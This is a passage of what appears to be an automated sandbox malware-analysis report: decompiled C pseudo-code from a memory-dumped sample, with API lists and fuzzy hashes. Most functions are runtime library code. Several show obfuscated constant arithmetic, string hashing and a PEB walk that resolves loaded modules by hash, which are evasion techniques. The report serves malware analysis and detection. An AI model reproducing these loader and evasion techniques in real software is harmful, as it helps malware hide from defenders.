                                                      												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
                                                      												_push( *(__ebp + 0xc) >> 0x10);
                                                      												__eax =  *(__ebp + 0xc) & 0x0000ffff;
                                                      												_push( *(__ebp + 0xc) & 0x0000ffff);
                                                      												__ecx = __edi;
                                                      												__eax =  *__ebx();
                                                      												 *(__ebp - 0x10) =  *(__ebp + 0xc) & 0x0000ffff;
                                                      												L6:
                                                      												__eflags = _t185;
                                                      												if(_t185 != 0) {
                                                      													goto L106;
                                                      												}
                                                      												goto L39;
                                                      											case 0x24:
                                                      												goto L106;
                                                      											case 0x25:
                                                      												__ecx = __edi;
                                                      												__eax =  *__ebx();
                                                      												__eflags = __eax;
                                                      												 *(__ebp - 0x10) = __eax;
                                                      												if(__eax == 0) {
                                                      													goto L106;
                                                      												}
                                                      												L39:
                                                      												 *(_t225 - 4) =  *(_t225 - 4) | 0xffffffff;
                                                      												E00408984(_t225 - 0x14);
                                                      												_t163 = 0;
                                                      												__eflags = 0;
                                                      												goto L40;
                                                      										}
                                                      									}
                                                      									_t170 =  *(_t225 - 0x18);
                                                      									_t58 =  &(_t170[1]);
                                                      									 *_t58 = _t170[1] & 0x00000000;
                                                      									__eflags =  *_t58;
                                                      									E00408984(_t225 - 0x14);
                                                      									goto L39;
                                                      								}
                                                      								_t173 = _t194;
                                                      								__eflags =  *(_t225 + 0x10) - _t173[2];
                                                      								if( *(_t225 + 0x10) != _t173[2]) {
                                                      									goto L25;
                                                      								}
                                                      								_t196 = _t173[1];
                                                      								 *(_t225 + 0x10) = _t196;
                                                      								E00408984(_t225 - 0x14);
                                                      								__eflags = _t196;
                                                      								if(_t196 == 0) {
                                                      									goto L39;
                                                      								}
                                                      								__eflags =  *(_t225 + 8) - 0xc000;
                                                      								if( *(_t225 + 8) < 0xc000) {
                                                      									goto L29;
                                                      								}
                                                      								goto L102;
                                                      							}
                                                      							__eflags =  *(_t147 + 0x74);
                                                      							if( *(_t147 + 0x74) <= 0) {
                                                      								goto L20;
                                                      							}
                                                      							__eflags = _t189 - 0x200;
                                                      							if(_t189 < 0x200) {
                                                      								L16:
                                                      								__eflags = _t189 - 0x100;
                                                      								if(_t189 < 0x100) {
                                                      									L18:
                                                      									__eflags = _t189 - 0x281 - 0x10;
                                                      									if(_t189 - 0x281 > 0x10) {
                                                      										goto L20;
                                                      									}
                                                      									L19:
                                                      									_t177 =  *((intOrPtr*)( *( *(_t222 + 0x4c)) + 0x94))(_t189,  *((intOrPtr*)(_t225 + 0xc)), _t224, _t225 - 0x10);
                                                      									__eflags = _t177;
                                                      									if(_t177 != 0) {
                                                      										goto L106;
                                                      									}
                                                      									goto L20;
                                                      								}
                                                      								__eflags = _t189 - 0x10f;
                                                      								if(_t189 <= 0x10f) {
                                                      									goto L19;
                                                      								}
                                                      								goto L18;
                                                      							}
                                                      							__eflags = _t189 - 0x209;
                                                      							if(_t189 <= 0x209) {
                                                      								goto L19;
                                                      							}
                                                      							goto L16;
                                                      						} else {
                                                      							_t181 = E0040B33B(_t189, _t222, _t222, _t224, _t224 >> 0x10);
                                                      							__eflags = _t181;
                                                      							if(_t181 != 0) {
                                                      								L2:
                                                      								 *((intOrPtr*)(_t225 - 0x10)) = 1;
                                                      								L106:
                                                      								_t160 =  *((intOrPtr*)(_t225 + 0x14));
                                                      								if(_t160 != 0) {
                                                      									 *_t160 =  *((intOrPtr*)(_t225 - 0x10));
                                                      								}
                                                      								 *(_t225 - 4) =  *(_t225 - 4) | 0xffffffff;
                                                      								E00408984(_t225 - 0x14);
                                                      								_t163 = 1;
                                                      								L40:
                                                      								return E0041F7C2(_t163);
                                                      							}
                                                      							goto L12;
                                                      						}
                                                      					}
                                                      					_t217 =  *(_t225 + 0x10);
                                                      					__eflags =  *_t217;
                                                      					if( *_t217 == 0) {
                                                      						goto L39;
                                                      					}
                                                      					_push(_t225 - 0x10);
                                                      					_push(_t217);
                                                      					_push( *((intOrPtr*)(_t225 + 0xc)));
                                                      					_t185 =  *((intOrPtr*)( *__ecx + 0xec))();
                                                      					goto L6;
                                                      				}
                                                      				_push( *(_t225 + 0x10));
                                                      				_push( *((intOrPtr*)(_t225 + 0xc)));
                                                      				if( *((intOrPtr*)( *__ecx + 0xe8))() == 0) {
                                                      					goto L39;
                                                      				}
                                                      				goto L2;
                                                      			}


























                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: H_prolog3
                                                      • String ID:
                                                      • API String ID: 431132790-0
                                                      • Opcode ID: e65aa5e75f71ceb4e916c33a80ae8f932e073520dab032e457e0a09d71efcd39
                                                      • Instruction ID: 4bf9ee2ada31b43de44771026367bd4f410c07c662d257adfd4bce1bafcdad22
                                                      • Opcode Fuzzy Hash: e65aa5e75f71ceb4e916c33a80ae8f932e073520dab032e457e0a09d71efcd39
                                                      • Instruction Fuzzy Hash: 4FF15E70500209EFDB14EF55C890ABE77A9EF04314F10853AF856BA2D1DB39D901DBAD
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E02252AEA(char* __ecx) {
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				signed int _v16;
                                                      				signed int _v20;
                                                      				intOrPtr _v24;
                                                      				intOrPtr _v28;
                                                      				intOrPtr _v32;
                                                      				intOrPtr _v36;
                                                      				intOrPtr _v40;
                                                      				intOrPtr _v44;
                                                      				intOrPtr _v48;
                                                      				intOrPtr _v52;
                                                      				intOrPtr _v56;
                                                      				intOrPtr _v60;
                                                      				char* _t125;
                                                      				signed int _t127;
                                                      				signed int _t128;
                                                      				signed int _t146;
                                                      
                                                      				_v20 = _v20 & 0x00000000;
                                                      				_v16 = _v16 & 0x00000000;
                                                      				_v60 = 0x63750aa;
                                                      				_v56 = 0xb3018990;
                                                      				_v52 = 0x7db474ba;
                                                      				_v48 = 0x3225899;
                                                      				_v44 = 0x5d32f0aa;
                                                      				_v40 = 0xdd0fa6dc;
                                                      				_v36 = 0x511dfadc;
                                                      				_v32 = 0xd4d99c8a;
                                                      				_v28 = 0x414c179a;
                                                      				_v24 = 0x20d4e2b7;
                                                      				_v12 = 0xfcba;
                                                      				_v12 = _v12 ^ 0xa6c2fe7d;
                                                      				_v12 = _v12 >> 0x10;
                                                      				_t125 = __ecx;
                                                      				_t127 = 0x7d;
                                                      				_v12 = _v12 / _t127;
                                                      				_v12 = _v12 << 0xd;
                                                      				_v12 = _v12 << 0xd;
                                                      				_v12 = _v12 ^ 0x54000000;
                                                      				_v8 = 0x4f36;
                                                      				_v8 = _v8 + 0xae67;
                                                      				_v8 = _v8 + 0xffffa2bb;
                                                      				_v8 = _v8 + 0xa00e;
                                                      				_t128 = 0x62;
                                                      				_v8 = _v8 / _t128;
                                                      				_v8 = _v8 + 0xffffc4b7;
                                                      				_t146 = 0x32;
                                                      				_v8 = _v8 / _t146;
                                                      				_v8 = _v8 ^ 0xc4105c7d;
                                                      				_v8 = _v8 ^ 0xc10eeb48;
                                                      				_v8 = 0x2c57;
                                                      				_v8 = _v8 >> 4;
                                                      				_v8 = _v8 >> 5;
                                                      				_v8 = _v8 | 0x3b42b64d;
                                                      				_v8 = _v8 ^ 0x3b42b64f;
                                                      				if( *__ecx != 0) {
                                                      					do {
                                                      						_v8 = 0x4f36;
                                                      						_v8 = _v8 + 0xae67;
                                                      						_v8 = _v8 + 0xffffa2bb;
                                                      						_v8 = _v8 + 0xa00e;
                                                      						_v8 = _v8 / _t128;
                                                      						_v8 = _v8 + 0xffffc4b7;
                                                      						_v8 = _v8 / _t146;
                                                      						_v8 = _v8 ^ 0xc4105c7d;
                                                      						_v8 = _v8 ^ 0xc10eeb48;
                                                      						_v8 = 0x2c57;
                                                      						_v8 = _v8 >> 4;
                                                      						_v8 = _v8 >> 5;
                                                      						_v8 = _v8 | 0x3b42b64d;
                                                      						_v8 = _v8 ^ 0x3b42b64f;
                                                      						_v12 =  *_t125;
                                                      						_v12 = _v12 + (_v12 << _v8);
                                                      						_v12 = _v12 + (_v12 << _v8);
                                                      						_v12 = _v12 - _v12;
                                                      						_t125 = _t125 + 1;
                                                      						_t128 = 0x62;
                                                      						_t146 = 0x32;
                                                      					} while ( *_t125 != 0);
                                                      				}
                                                      				return _v12;
                                                      			}

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.347505404.0000000002251000.00000020.00000001.sdmp, Offset: 02250000, based on PE: true
                                                      • Associated: 00000001.00000002.347493243.0000000002250000.00000004.00000001.sdmp
                                                      • Associated: 00000001.00000002.347513236.0000000002259000.00000004.00000001.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2250000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e0f3d2a3ec99de75330360b9048c52887a3ab58b5cf868be08c74c3ef050c9a4
                                                      • Instruction ID: 6f860351f67b6af65f65f7c563294a47a6fd2e4fef92f2d4513905f049998d59
                                                      • Opcode Fuzzy Hash: e0f3d2a3ec99de75330360b9048c52887a3ab58b5cf868be08c74c3ef050c9a4
                                                      • Instruction Fuzzy Hash: 1741CCB1D0271CEFEB15CFA5C6896DEFBB1AB55328F20C089C040AB294D3B55B45EB81
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E02252EC1(void* __ecx) {
                                                      				void* _t9;
                                                      				intOrPtr* _t13;
                                                      				intOrPtr* _t14;
                                                      
                                                      				_t9 = __ecx;
                                                      				_t13 =  *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc;
                                                      				_t14 =  *_t13;
                                                      				while(_t14 != _t13) {
                                                      					if((E02252C80( *((intOrPtr*)(_t14 + 0x30))) ^ 0x7a1628f1) == _t9) {
                                                      						return  *((intOrPtr*)(_t14 + 0x18));
                                                      					}
                                                      					_t14 =  *_t14;
                                                      				}
                                                      				return 0;
                                                      			}

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.347505404.0000000002251000.00000020.00000001.sdmp, Offset: 02250000, based on PE: true
                                                      • Associated: 00000001.00000002.347493243.0000000002250000.00000004.00000001.sdmp
                                                      • Associated: 00000001.00000002.347513236.0000000002259000.00000004.00000001.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2250000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2bfe828df6a8f02fb092adc4ca50bb5b758bda64b22ec1e022768fd2f382f04c
                                                      • Instruction ID: aadc6d23e4131fa7c67c58f409402c9f582b77b6b898041c8be5cbf7b7e3d2ac
                                                      • Opcode Fuzzy Hash: 2bfe828df6a8f02fb092adc4ca50bb5b758bda64b22ec1e022768fd2f382f04c
                                                      • Instruction Fuzzy Hash: 75E04F32734561CBD660DAD9D880956F3E5FB8027172A896ADD45D3A44C374BC00C680
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E022537AF() {
                                                      
                                                      				return  *[fs:0x30];
                                                      			}

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.347505404.0000000002251000.00000020.00000001.sdmp, Offset: 02250000, based on PE: true
                                                      • Associated: 00000001.00000002.347493243.0000000002250000.00000004.00000001.sdmp
                                                      • Associated: 00000001.00000002.347513236.0000000002259000.00000004.00000001.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2250000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                      • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                      • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                      • Instruction Fuzzy Hash:
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 91%
                                                      			E00424996(void* __ebx) {
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				_Unknown_base(*)()* _t7;
                                                      				long _t10;
                                                      				void* _t11;
                                                      				int _t12;
                                                      				void* _t18;
                                                      				intOrPtr _t21;
                                                      				long _t26;
                                                      				void* _t30;
                                                      				struct HINSTANCE__* _t37;
                                                      				void* _t40;
                                                      				void* _t42;
                                                      
                                                      				_t30 = __ebx;
                                                      				_t37 = GetModuleHandleA("KERNEL32.DLL");
                                                      				if(_t37 != 0) {
                                                      					 *0x446a2c = GetProcAddress(_t37, "FlsAlloc");
                                                      					 *0x446a30 = GetProcAddress(_t37, "FlsGetValue");
                                                      					 *0x446a34 = GetProcAddress(_t37, "FlsSetValue");
                                                      					_t7 = GetProcAddress(_t37, "FlsFree");
                                                      					__eflags =  *0x446a2c;
                                                      					_t40 = TlsSetValue;
                                                      					 *0x446a38 = _t7;
                                                      					if( *0x446a2c == 0) {
                                                      						L6:
                                                      						 *0x446a30 = TlsGetValue;
                                                      						 *0x446a2c = E004246B6;
                                                      						 *0x446a34 = _t40;
                                                      						 *0x446a38 = TlsFree;
                                                      					} else {
                                                      						__eflags =  *0x446a30;
                                                      						if( *0x446a30 == 0) {
                                                      							goto L6;
                                                      						} else {
                                                      							__eflags =  *0x446a34;
                                                      							if( *0x446a34 == 0) {
                                                      								goto L6;
                                                      							} else {
                                                      								__eflags = _t7;
                                                      								if(_t7 == 0) {
                                                      									goto L6;
                                                      								}
                                                      							}
                                                      						}
                                                      					}
                                                      					_t10 = TlsAlloc();
                                                      					__eflags = _t10 - 0xffffffff;
                                                      					 *0x4438c0 = _t10;
                                                      					if(_t10 == 0xffffffff) {
                                                      						L15:
                                                      						_t11 = 0;
                                                      						__eflags = 0;
                                                      					} else {
                                                      						_t12 = TlsSetValue(_t10,  *0x446a30);
                                                      						__eflags = _t12;
                                                      						if(_t12 == 0) {
                                                      							goto L15;
                                                      						} else {
                                                      							E0041FBD2();
                                                      							 *0x446a2c = E004245E7( *0x446a2c);
                                                      							 *0x446a30 = E004245E7( *0x446a30);
                                                      							 *0x446a34 = E004245E7( *0x446a34);
                                                      							 *0x446a38 = E004245E7( *0x446a38);
                                                      							_t18 = E00422CB7();
                                                      							__eflags = _t18;
                                                      							if(_t18 == 0) {
                                                      								L14:
                                                      								E004246E9();
                                                      								goto L15;
                                                      							} else {
                                                      								_push(E00424875);
                                                      								_t21 =  *((intOrPtr*)(E00424653( *0x446a2c)))();
                                                      								__eflags = _t21 - 0xffffffff;
                                                      								 *0x4438bc = _t21;
                                                      								if(_t21 == 0xffffffff) {
                                                      									goto L14;
                                                      								} else {
                                                      									_t42 = E004265A8(1, 0x214);
                                                      									__eflags = _t42;
                                                      									if(_t42 == 0) {
                                                      										goto L14;
                                                      									} else {
                                                      										_push(_t42);
                                                      										_push( *0x4438bc);
                                                      										__eflags =  *((intOrPtr*)(E00424653( *0x446a34)))();
                                                      										if(__eflags == 0) {
                                                      											goto L14;
                                                      										} else {
                                                      											_push(0);
                                                      											_push(_t42);
                                                      											E00424726(_t30, _t37, _t42, __eflags);
                                                      											_t26 = GetCurrentThreadId();
                                                      											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
                                                      											 *_t42 = _t26;
                                                      											_t11 = 1;
                                                      										}
                                                      									}
                                                      								}
                                                      							}
                                                      						}
                                                      					}
                                                      					return _t11;
                                                      				} else {
                                                      					E004246E9();
                                                      					return 0;
                                                      				}
                                                      			}

















                                                      APIs
                                                      • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,0041F5CD), ref: 0042499C
                                                      • __mtterm.LIBCMT ref: 004249A8
                                                        • Part of subcall function 004246E9: __decode_pointer.LIBCMT ref: 004246FA
                                                        • Part of subcall function 004246E9: TlsFree.KERNEL32(00000020,00424B15), ref: 00424714
                                                      • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004249BE
                                                      • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004249CB
                                                      • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 004249D8
                                                      • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004249E5
                                                      • TlsAlloc.KERNEL32 ref: 00424A35
                                                      • TlsSetValue.KERNEL32(00000000), ref: 00424A50
                                                      • __init_pointers.LIBCMT ref: 00424A5A
                                                      • __encode_pointer.LIBCMT ref: 00424A65
                                                      • __encode_pointer.LIBCMT ref: 00424A75
                                                      • __encode_pointer.LIBCMT ref: 00424A85
                                                      • __encode_pointer.LIBCMT ref: 00424A95
                                                      • __decode_pointer.LIBCMT ref: 00424AB6
                                                      • __calloc_crt.LIBCMT ref: 00424ACF
                                                      • __decode_pointer.LIBCMT ref: 00424AE9
                                                      • __initptd.LIBCMT ref: 00424AF8
                                                      • GetCurrentThreadId.KERNEL32 ref: 00424AFF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: AddressProc__encode_pointer$__decode_pointer$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
                                                      • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                      • API String ID: 2657569430-3819984048
                                                      • Opcode ID: 7b02d7ed6b3b6a7ce64f6f14d22585a98f71800e69ec1092eb72b2d7174e1ea0
                                                      • Instruction ID: 963e8a1070996f63c3d0f3f4c191d7009e08024d37f58c6308c9cc54aea640d7
                                                      • Opcode Fuzzy Hash: 7b02d7ed6b3b6a7ce64f6f14d22585a98f71800e69ec1092eb72b2d7174e1ea0
                                                      • Instruction Fuzzy Hash: 13318079740B209BCB116B79BC05B067AA4EB87754B51853BE410B2AA0DF79D480CF5E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E0041CD37(intOrPtr* __ecx) {
                                                      				intOrPtr* _t27;
                                                      
                                                      				_t27 = __ecx;
                                                      				 *_t27 = RegisterClipboardFormatA("Native");
                                                      				 *((intOrPtr*)(_t27 + 4)) = RegisterClipboardFormatA("OwnerLink");
                                                      				 *((intOrPtr*)(_t27 + 8)) = RegisterClipboardFormatA("ObjectLink");
                                                      				 *((intOrPtr*)(_t27 + 0xc)) = RegisterClipboardFormatA("Embedded Object");
                                                      				 *((intOrPtr*)(_t27 + 0x10)) = RegisterClipboardFormatA("Embed Source");
                                                      				 *((intOrPtr*)(_t27 + 0x14)) = RegisterClipboardFormatA("Link Source");
                                                      				 *((intOrPtr*)(_t27 + 0x18)) = RegisterClipboardFormatA("Object Descriptor");
                                                      				 *((intOrPtr*)(_t27 + 0x1c)) = RegisterClipboardFormatA("Link Source Descriptor");
                                                      				 *((intOrPtr*)(_t27 + 0x20)) = RegisterClipboardFormatA("FileName");
                                                      				 *((intOrPtr*)(_t27 + 0x24)) = RegisterClipboardFormatA("FileNameW");
                                                      				 *((intOrPtr*)(_t27 + 0x28)) = RegisterClipboardFormatA("Rich Text Format");
                                                      				 *((intOrPtr*)(_t27 + 0x2c)) = RegisterClipboardFormatA("RichEdit Text and Objects");
                                                      				return _t27;
                                                      			}





                                                      APIs
                                                      • RegisterClipboardFormatA.USER32 ref: 0041CD46
                                                      • RegisterClipboardFormatA.USER32 ref: 0041CD4F
                                                      • RegisterClipboardFormatA.USER32 ref: 0041CD59
                                                      • RegisterClipboardFormatA.USER32 ref: 0041CD63
                                                      • RegisterClipboardFormatA.USER32 ref: 0041CD6D
                                                      • RegisterClipboardFormatA.USER32 ref: 0041CD77
                                                      • RegisterClipboardFormatA.USER32 ref: 0041CD81
                                                      • RegisterClipboardFormatA.USER32 ref: 0041CD8B
                                                      • RegisterClipboardFormatA.USER32 ref: 0041CD95
                                                      • RegisterClipboardFormatA.USER32 ref: 0041CD9F
                                                      • RegisterClipboardFormatA.USER32 ref: 0041CDA9
                                                      • RegisterClipboardFormatA.USER32 ref: 0041CDB3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: ClipboardFormatRegister
                                                      • String ID: Embed Source$Embedded Object$FileName$FileNameW$Link Source$Link Source Descriptor$Native$Object Descriptor$ObjectLink$OwnerLink$Rich Text Format$RichEdit Text and Objects
                                                      • API String ID: 1228543026-2889995556
                                                      • Opcode ID: fa62fb11877792a06cbeae9f6a028dd3d60365e63ae9067f928d27611659888e
                                                      • Instruction ID: 185d9513e9e3c8f8d91afcc4ef31229a7346f959b1470ae00d2bb1a9d435a8cc
                                                      • Opcode Fuzzy Hash: fa62fb11877792a06cbeae9f6a028dd3d60365e63ae9067f928d27611659888e
                                                      • Instruction Fuzzy Hash: 1E0139B2A447845ACF30AF769C09907BAE0EEC9B10721696FE4C587750D6B8D401DF88
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 46%
                                                      			E0041C757(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                                      				void* _t190;
                                                      				intOrPtr* _t200;
                                                      				signed int _t203;
                                                      				signed int _t206;
                                                      				intOrPtr* _t208;
                                                      				intOrPtr _t211;
                                                      				char _t230;
                                                      				CHAR* _t236;
                                                      				intOrPtr _t237;
                                                      				signed short _t240;
                                                      				signed int _t241;
                                                      				signed int _t242;
                                                      				signed int _t250;
                                                      				signed int* _t257;
                                                      				signed int _t258;
                                                      				signed int _t277;
                                                      				signed short* _t278;
                                                      				signed short* _t279;
                                                      				signed int _t290;
                                                      				intOrPtr* _t293;
                                                      				CHAR* _t295;
                                                      				intOrPtr* _t296;
                                                      				intOrPtr _t297;
                                                      				signed int** _t299;
                                                      				void* _t300;
                                                      				void* _t301;
                                                      				void* _t302;
                                                      				void* _t313;
                                                      
                                                      				_push(0x7c);
                                                      				_t190 = E0041F6EA(E0043377E, __ebx, __edi, __esi);
                                                      				 *((intOrPtr*)(_t300 - 0x24)) = __ecx;
                                                      				_t257 = 0;
                                                      				if( *((intOrPtr*)(__ecx)) == 0) {
                                                      					L78:
                                                      					return E0041F7C2(_t190);
                                                      				}
                                                      				 *((intOrPtr*)(_t300 - 0x54)) = 0;
                                                      				 *((intOrPtr*)(_t300 - 0x50)) = 0;
                                                      				 *(_t300 - 0x4c) = 0;
                                                      				 *((intOrPtr*)(_t300 - 0x48)) = 0;
                                                      				 *(_t300 - 4) = 0;
                                                      				E0041F330(__edi, _t300 - 0x54, 0, 0x10);
                                                      				_t302 = _t301 + 0xc;
                                                      				if( *(_t300 + 0x18) != 0) {
                                                      					 *(_t300 - 0x4c) = lstrlenA( *(_t300 + 0x18));
                                                      				}
                                                      				 *((intOrPtr*)(_t300 - 0x20)) = 0xfffffffd;
                                                      				if(( *(_t300 + 0xc) & 0x0000000c) != 0) {
                                                      					 *((intOrPtr*)(_t300 - 0x48)) = 1;
                                                      					 *((intOrPtr*)(_t300 - 0x50)) = _t300 - 0x20;
                                                      				}
                                                      				 *((intOrPtr*)(_t300 - 0x68)) = 0x437058;
                                                      				 *((intOrPtr*)(_t300 - 0x64)) = _t257;
                                                      				 *((intOrPtr*)(_t300 - 0x58)) = _t257;
                                                      				 *((intOrPtr*)(_t300 - 0x5c)) = _t257;
                                                      				 *((intOrPtr*)(_t300 - 0x60)) = _t257;
                                                      				_t194 =  *(_t300 - 0x4c);
                                                      				_t308 =  *(_t300 - 0x4c) - _t257;
                                                      				 *(_t300 - 4) = 1;
                                                      				_t293 = 4;
                                                      				if( *(_t300 - 0x4c) == _t257) {
                                                      					L37:
                                                      					_t295 = 0;
                                                      					E0041A7E4(_t300 - 0x44);
                                                      					if( *(_t300 + 0x10) != _t257) {
                                                      						_t295 = _t300 - 0x44;
                                                      					}
                                                      					E0041F330(_t293, _t300 - 0x88, _t257, 0x20);
                                                      					_t200 =  *((intOrPtr*)( *((intOrPtr*)(_t300 - 0x24))));
                                                      					 *(_t300 - 0x28) =  *(_t300 - 0x28) | 0xffffffff;
                                                      					 *(_t300 + 0xc) =  *((intOrPtr*)( *_t200 + 0x18))(_t200,  *((intOrPtr*)(_t300 + 8)), 0x439340, _t257,  *(_t300 + 0xc), _t300 - 0x54, _t295, _t300 - 0x88, _t300 - 0x28);
                                                      					E0041C700(_t300 - 0x68);
                                                      					_t203 =  *(_t300 - 0x4c);
                                                      					if(_t203 == _t257) {
                                                      						L46:
                                                      						_push( *((intOrPtr*)(_t300 - 0x54)));
                                                      						E00402F0C(_t257, _t293, _t295, _t319);
                                                      						 *((intOrPtr*)(_t300 - 0x54)) = _t257;
                                                      						if( *(_t300 + 0xc) >= _t257) {
                                                      							L61:
                                                      							_t295 =  *(_t300 + 0x10);
                                                      							if(_t295 == _t257) {
                                                      								L76:
                                                      								 *(_t300 - 4) = 0;
                                                      								_t190 = E0041B9F7(_t300 - 0x68);
                                                      								 *(_t300 - 4) =  *(_t300 - 4) | 0xffffffff;
                                                      								__eflags =  *((intOrPtr*)(_t300 - 0x54)) - _t257;
                                                      								if(__eflags != 0) {
                                                      									_push( *((intOrPtr*)(_t300 - 0x54)));
                                                      									_t190 = E00402F0C(_t257, _t293, _t295, __eflags);
                                                      								}
                                                      								goto L78;
                                                      							}
                                                      							if(_t295 == 0xc) {
                                                      								L65:
                                                      								_t206 = (_t295 & 0x0000ffff) + 0xfffffffe;
                                                      								__eflags = _t206 - 0x13;
                                                      								if(_t206 > 0x13) {
                                                      									goto L76;
                                                      								}
                                                      								switch( *((intOrPtr*)(_t206 * 4 +  &M0041CCE7))) {
                                                      									case 0:
                                                      										__eax =  *(__ebp + 0x14);
                                                      										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
                                                      										goto L76;
                                                      									case 1:
                                                      										__eax =  *(__ebp + 0x14);
                                                      										__ecx =  *(__ebp - 0x3c);
                                                      										 *( *(__ebp + 0x14)) = __ecx;
                                                      										goto L76;
                                                      									case 2:
                                                      										__eax =  *(__ebp + 0x14);
                                                      										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
                                                      										goto L76;
                                                      									case 3:
                                                      										__eax =  *(__ebp + 0x14);
                                                      										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
                                                      										goto L76;
                                                      									case 4:
                                                      										__ecx =  *(__ebp - 0x3c);
                                                      										__eax =  *(__ebp + 0x14);
                                                      										 *__eax =  *(__ebp - 0x3c);
                                                      										__ecx =  *(__ebp - 0x38);
                                                      										 *(__eax + 4) = __ecx;
                                                      										goto L76;
                                                      									case 5:
                                                      										__eax = E0040ECBE(__eax, __ecx,  *(__ebp + 0x14),  *(__ebp - 0x3c));
                                                      										_push( *(__ebp - 0x3c));
                                                      										__imp__#6();
                                                      										goto L76;
                                                      									case 6:
                                                      										__ecx =  *(__ebp + 0x14);
                                                      										__eax = 0;
                                                      										__eflags =  *(__ebp - 0x3c) - __bx;
                                                      										__eax = 0 | __eflags != 0x00000000;
                                                      										 *__ecx = __eflags != 0;
                                                      										goto L76;
                                                      									case 7:
                                                      										__edi =  *(__ebp + 0x14);
                                                      										__esi = __ebp - 0x44;
                                                      										asm("movsd");
                                                      										asm("movsd");
                                                      										asm("movsd");
                                                      										asm("movsd");
                                                      										__ebx = 0;
                                                      										goto L76;
                                                      									case 8:
                                                      										goto L76;
                                                      									case 9:
                                                      										 *((char*)( *((intOrPtr*)(_t300 + 0x14)))) =  *((intOrPtr*)(_t300 - 0x3c));
                                                      										goto L76;
                                                      								}
                                                      							}
                                                      							_t208 = _t300 - 0x44;
                                                      							__imp__#12(_t208, _t208, _t257, _t295);
                                                      							_t293 = _t208;
                                                      							_t321 = _t293 - _t257;
                                                      							if(_t293 >= _t257) {
                                                      								goto L65;
                                                      							}
                                                      							__imp__#9(_t300 - 0x44);
                                                      							_push(_t293);
                                                      							L49:
